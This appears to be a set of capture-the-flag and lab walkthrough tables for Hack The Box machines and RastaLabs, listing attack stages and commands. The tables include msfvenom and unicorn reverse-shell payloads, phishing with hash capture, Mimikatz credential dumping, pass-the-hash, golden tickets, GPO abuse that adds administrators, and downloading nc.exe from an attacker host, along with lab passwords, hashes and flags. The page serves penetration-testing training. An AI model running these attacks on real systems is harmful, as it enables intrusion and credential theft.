Comment on page
Network Scenarios
LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts
Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket
always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service
Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DSync Attack
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Online search for lab IP range | N/A |
2 | Enumeration | Port scanning with masscan | masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0 |
3 | Enumeration | Detailed host scanning with nmap | nmap (specific commands not provided) |
4 | Enumeration | Finding domain names with crackmapexec | crackmapexec (specific commands not provided) |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | nmap -sC -sV -oA nmap/result 10.10.10.210 |
2 | Enumeration | Gobuster directory scanning | gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50 |
3 | Credential Harvesting | Gathering usernames | Gather usernames manually and create a user.txt file |
4 | Credential Harvesting | Password spraying | python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01 |
5 | Phishing | Sending phishing emails | Use Outlook to send phishing emails and capture NTLMv2 hash with Responder |
6 | Hash Cracking | Cracking NTLMv2 hash | hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force |
7 | Access | PowerShell remote session | $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson |
8 | Privilege Escalation | Creating a Symlink | New-Item -ItemType Junction -Path 'C:\\ProgramData\\root' -Target 'C:\\Users\\Administrator' |
9 | Privilege Escalation | Using Check-File command | Check-File C:\\programdata\\root\\Desktop\\root.txt |
10 | Exfiltration | Transferring files with nc.exe | iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe' |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | nmap -sC -sV -oA nmap/result 10.10.10.211 |
2 | Web Enumeration | Checking server with Wappalyzer | Use Wappalyzer to identify backend technologies |
3 | Web Enumeration | Analyzing .git directory | Check the Gemfile in the .git directory for Ruby and Gem versions |
4 | Exploitation | Exploiting Ruby on Rails | Use a Ruby on Rails exploit |
5 | Post-Exploitation | Capturing request in Burp | Capture the request and modify it with the exploit |
6 | Post-Exploitation | Getting a reverse shell | Use netcat listener and send the exploit to get a reverse shell |
7 | Privilege Escalation | Cracking password hashes | Use John the Ripper to crack password hashes found in /var/backups |
8 | Privilege Escalation | Using .google_authenticator file | Use the contents of .google_authenticator to bypass two-factor authentication |
9 | Privilege Escalation | Synchronizing time for successful exploit | Adjust the system time to match the timezone for the exploit to work |
10 | Privilege Escalation | Gaining root access with GTFOBins | sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | nmap -sV -sC -oN nmap 10.10.10.237 |
2 | File Analysis | Analyzing executable file | file heedv1\\ Setup\\ 1.0.0.exe |
3 | SMB Enumeration | Enumerating SMB shares | smbclient -L \\\\10.10.10.237 |
4 | SMB File Transfer | Transferring files via SMB | smbclient \\\\\\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf |
5 | Exploitation | Crafting malicious binary | msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe" |
6 | YML File Creation | Creating a .yml file for the exploit | Manual creation of latest.yml file |
7 | SMB File Transfer | Uploading .yml file via SMB | smbclient \\\\\\\\10.10.10.237\\Software_Updates then put latest.yml |
8 | Reverse Shell | Obtaining a reverse shell | Use Metasploit to listen for the reverse shell |
9 | Redis Exploitation | Exploiting Redis | redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 |
10 | Password Decryption | Decrypting password | python3 decrypt.py with the script provided in the summary |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Data Analysis | Reading pcap file | Use NetworkMiner to read the .dmp file and extract the secret file |
2 | Cryptography | Decoding the flag | Use filecryptopgraphy.psm1 PowerShell module |
3 | File Preparation | Preparing files for decryption | Rename the secret file to secret.txt.AES on ws04 |
4 | Key Conversion | Converting key for decryption | `$key = Get-Content key.txt |
5 | File Decryption | Decrypting the file | Unprotect-File '.\\secret.txt.AES' -Algorithm AES -Key $key |
6 | Flag Retrieval | Retrieving the flag | The flag is RASTA{cryp70_3xf1l7r4710n} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Dumping | Enumerating credentials on WS02 | Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force |
2 | Credential Dumping | Using Mimikatz to dump creds | Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key |
3 | Credential Decryption | Decrypting credentials | dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84... |
4 | Port Forwarding | Setting up port forwarding | portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389 |
5 | RDP Connection | Connecting via RDP with Remmina | Install Remmina, import sql01.rdp , change host, export to .rdp file |
6 | RDP Connection | Using xfreerdp to connect | xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local |
7 | Flag Retrieval | Retrieving the flag | The flag is RASTA{c00k1n6_w17h_645_n0w} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Enumeration | Finding LAPS group members | Enumeration to find ngodfrey_adm is part of LAPS group on WS05 |
2 | Credential Access | Dumping credentials with PowerSploit | powershell -ep bypass then Import-module ./PowerSploit.psd1 |
3 | Credential Access | Using credentials for access | $SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\\ngodfrey_adm', $SecPassword) |
4 | Credential Access | Getting AD object with credentials | Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred |
5 | Local Admin Passwords | Retrieving local admin passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 |
6 | Port Forwarding | Setting up port forwarding with Meterpreter | portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445 and similar for other ports |
7 | Exploitation | Using MS17-010 exploit for admin shell | exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080 |
8 | Flag Retrieval | Retrieving flags from WS02 and WS04 | Flags are RASTA{3v3ryb0dy_l0v35_l4p5} , RASTA{wh3r3_w45_2f4_!?} , RASTA{50m371m35_y0u_mu57_b4ck7r4ck} |
9 | Post-Exploitation | Running Mimikatz on WS02 | privilege::debug then sekurlsa::logonPasswords |
10 | File Permissions | Modifying file permissions for flag | icacls flag.txt /grant administrator:F or icacls flag.txt /grant RLAB\\ahope:F |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Privilege Escalation | AS-REP Roasting | Import-module ./asreproast.ps1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash |
2 | Hash Extraction | Saving Hash | Copy the hash to a txt file and save it with UTF-8 encoding |
3 | Wordlist Creation | Using kwprocessor | ./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt |
4 | Password Cracking | Using John the Ripper | Use John the Ripper (jumbo version) to crack the hash |
5 | Credential Use | User Enumeration | net use H: \\\\fs01.rastalabs.local\\home$\\ngodfrey /user:ngodfrey "zaq123$%^&*()_+" |
6 | Flag Retrieval | Accessing Flag | The flag is RASTA{k3rb3r05_15_7r1cky} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Viewing shares on fs01 | net view \\fs01 /all |
2 | Enumeration | Using PowerSploit for enumeration | powershell -ep bypass
Import-module ./PowerSploit.psd1
Get-NetShare \\fs01 |
3 | Flag Retrieval | Accessing open shares | Flag is RASTA{ju1cy_1nf0_1n_0p3n_5h4r35} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Phishing | Creating phishing HTA | python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta |
2 | Web Server Setup | Hosting HTA on Apache2 | copy index.html launcher.hta /var/www/html
service apache2 start |
3 | Listener Setup | Setting up Metasploit listener | msfconsole -r unicorn.rc |
4 | Share Enumeration | Viewing shares on the network | net share
net view
net use K: \\\\hostname\\share$
net view \\\\hostname /all |
5 | User Enumeration | Displaying domain user accounts | net user /domain |
6 | User Information | Viewing user info | net user [username] /domain |
7 | Group Enumeration | Viewing domain group members | net group finance /domain |
8 | Drive Enumeration | Listing logical drives | fsutil fsinfo drives
wmic logicaldisk get name
diskpart > list volume |
9 | Network Recon | Pinging servers for IP addresses | ping DC01
ping FS01
ping MX01
ping NIX01
ping SQL01
ping WS01
ping WS02
ping WS03
ping WS05 |
10 | Flag Retrieval | Accessing the flag | Flag is RASTA{w007_f007h0ld_l375_pwn} |
11 | KeePass Database | Found KeePass database and key file | Located in M:\\Documents |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | User Enumeration | Finding user directory on fs01 | net user ahope /domain |
2 | Network Drive Mount | Mounting network drive to access file | net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209" |
3 | File Conversion | Converting .ppk to OpenSSH format | puttygen nix01.ppk -O private-openssh -o nix |
4 | Network Configuration | Adding route and running proxy server | Commands for adding route and running socks4a proxy server on ws01 not provided in summary |
5 | SSH Connection | Connecting via SSH with proxychains | proxychains ssh -i nix [email protected] |
6 | Privilege Escalation | Using exploit for privilege escalation | Compile exploit with gcc exp1.c -o exploit |
7 | File Transfer | Transferring exploit to target | proxychains scp -i nix -r exploit [email protected]:/home/ahope |
8 | File Download | Downloading file from remote to local | proxychains scp -i nix [email protected]:/usr/local/sbin/paycalc /root/Desktop/rasta |
9 | Flag Retrieval | Retrieving the flag | Flag is RASTA{y0ur3_4_b4ll3r_70_637_7h15} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws01 | portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445 |
2 | Remote Execution | Using Metasploit psexec for shell | Use msf psexec to get a shell on ws01 |
3 | Remote Execution | Using Impacket psexec for shell | Use Impacket psexec to get a shell on ws01 , add route in meterpreter |
4 | Proxy Configuration | Setting SOCKS4a proxy in Metasploit | Set socks4a proxy in msf, then edit /etc/proxychains.conf |
5 | Enumeration | Using CrackMapExec to enumerate | proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi |
6 | Hash Dumping | Dumping hashes | Dump hashes with CrackMapExec and proxychains |
7 | Credential Access | Accessing vault with Mimikatz | Use Mimikatz on ws01 to access vault credentials |
8 | Credential Decryption | Decrypting credentials | dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey> |
9 | Impersonation | Impersonating user with Incognito | In meterpreter, load incognito and impersonate rweston |
10 | Clipboard Monitoring | Monitoring clipboard for credentials | Transfer shell to Empire and monitor clipboard |
11 | RDP Connection | Connecting via RDP with credentials | xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10 |
12 | Flag Retrieval | Retrieving the flag | Flag is RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws05 | portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445 |
2 | Credential Use | Using rweston_da hash | rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa |
3 | Exploitation | Exploit via smb/psexec | Use the hash with smb/psexec to exploit |
4 | Flag Retrieval | Retrieving the flag | Flag is RASTA{53rv1c3_4bu53_f7w} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Using epugh_adm credentials | Log in to web01 (10.10.110.10) and then RDP to sql01 (10.10.122.15) using epugh_adm creds |
2 | Lateral Movement | RDP to fs01 with gopikrishna | RDP to fs01 with user gopikrishna [local admin] |
3 | Malware Execution | Running p0wnedshell.exe | Run p0wnedshell.exe with admin cmd |
4 | Credential Dumping | Invoke Mimikatz from p0wnedshell | Use option 4 in p0wnedshell , invoke Mimikatz to get rweston_da NTLM hash |
5 | Credential Use | Pass-the-hash with Mimikatz | sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa |
6 | Golden Ticket Attack | Perform DCSync to get krbtgt hash | Use option 10 in p0wnedshell , perform DCSync |
7 | Golden Ticket Attack | Generate golden ticket | kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket |
8 | Golden Ticket Attack | Use golden ticket | kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket |
9 | Flag Retrieval | Accessing the flag | pushd \\\\dc01.rastalabs.local\\C$
Flag is RASTA{r4574l4b5_ch4mp10n} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Access | Using epugh_adm credentials | Log in to web01 (10.10.110.10) |
2 | Lateral Movement | RDP to sql01 with epugh_adm creds | Take RDP of sql01 (10.10.122.15) using epugh_adm credentials |
3 | Database Access | Start SQL Management Studio | Start SQL Management Studio and connect via Windows authentication |
4 | Database Querying | Querying SQL database | use umbraco;
SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' |
5 | Flag Retrieval | Retrieving the flag from database | select * from Flag
Flag is RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Logging in with epugh_adm credentials | mstsc /v:web01 /u:epugh_adm /p:[password] |
2 | Lateral Movement | RDP to sql01 using epugh_adm | mstsc /v:sql01 /u:epugh_adm /p:[password] |
3 | GPO Enumeration | Enumerating GPO permissions | `Get-NetGPO |
4 | Group Membership | Checking group members | net user epugh_adm /domain |
5 | GPO Permission | Finding GPO with weak permissions | `Get-NetGPO -ComputerName fs01.rastalabs.local |
6 | OU Enumeration | Finding host with specific policy | `Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}" |
7 | Policy Enumeration | Identifying applied policy | `Get-NetGPO -ComputerName fs01.rastalabs.local |
8 | GPO Abuse | Creating and applying immediate tasks | New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force
New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force |
9 | File Permissions | Modifying permissions for flag.txt | icacls flag.txt /grant administrators:F |
10 | Flag Retrieval | Retrieving the flag | Flag is RASTA{6p0_4bu53_15_h4rdc0r3} |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap scan | nmap -sC -sV 10.10.10.197 |
2 | DNS Enumeration | Brute-force subdomains | ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185 |
3 | Email Gathering | Extract emails | Extract emails from http://sneakycorp.htb/team.php to mails.txt |
4 | Phishing | Send phishing emails | Use swaks to send emails to addresses in mails.txt |
5 | Credential Harvesting | Decode credentials | Use Burp Suite to decode credentials from intercepted traffic |
6 | Email Client Setup | Configure email client | Set up evolution with SMTP server and [email protected] credentials |
7 | FTP Access | Access FTP | ftp 10.10.10.197 with credentials obtained |
8 | Reverse Shell | Upload and trigger reverse shell | Upload rev.php via FTP and trigger with curl |
9 | Privilege Escalation | Add SSH key to authorized keys | Add generated SSH key to /home/low/.ssh/authorized_keys via malicious package |
10 | Sudo Exploitation | Exploit sudo permissions | Use sudo /usr/bin/pip3 to execute a malicious package with a reverse shell |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Scanning | Masscan and Nmap | masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0
nmap [options] [target] |
2 | Web Enumeration | Checking web ports | Access web service on ports 80 and 443 |
3 | SSL Certificate | Viewing certificate | View SSL certificate details |
4 | Host File Editing | Adding VHOST to hosts file | Edit /etc/hosts to add staging-order.mango.htb |
5 | NoSQL Injection | Bypassing login | Use Burp Suite to intercept and modify request for NoSQL injection |
6 | Data Extraction | Automating credential extraction | Run Python script to extract credentials for admin and mango users |
7 | SSH Connection | Accessing SSH | SSH into the server using extracted credentials |
8 | User Flag Access | Retrieving user flag | Use su to login as admin and retrieve user flag |
9 | Privilege Escalation | Exploiting SUID file | Use SUID file to read root flag or exploit for root access |
10 | Root Flag Access | Reading root flag | Run binary or use jjs to read root flag |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance |